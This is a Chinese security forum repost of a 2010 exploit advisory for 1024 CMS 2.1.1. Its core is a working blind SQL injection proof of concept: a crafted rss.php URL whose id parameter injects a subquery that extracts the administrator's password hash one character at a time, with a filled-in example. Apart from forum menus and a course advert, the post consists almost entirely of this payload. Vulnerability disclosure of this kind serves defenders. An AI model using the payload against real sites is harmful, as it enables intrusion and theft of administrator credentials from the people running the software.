首页
社区
课程
招聘
[推荐][转帖]1024 CMS 2.1.1 Blind SQL Injection Vulnerability
发表于: 2010-9-9 10:46 1881

[推荐][转帖]1024 CMS 2.1.1 Blind SQL Injection Vulnerability

2010-9-9 10:46
1881
# Exploit Title: 1024cms 2.1.1 Blind SQL Injection Vulnerability  

# Date: 07.09.2010  

# Author: Stephan Sattler // Solidmedia.de  

# Software Website: http://1024cms.org  

# Software Link: http://d10xg45o6p6dbl.cloudfront.net/projects/f/freecms1024/1024_v2.zip  

or http://sourceforge.net/projects/cms-cvi/files/v2.1.zip/download  

# Version: 2.1.1  

   

   

[ Vulnerability//PoC ]  

   

http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='[first character of admin hash]  

example: http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='c

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//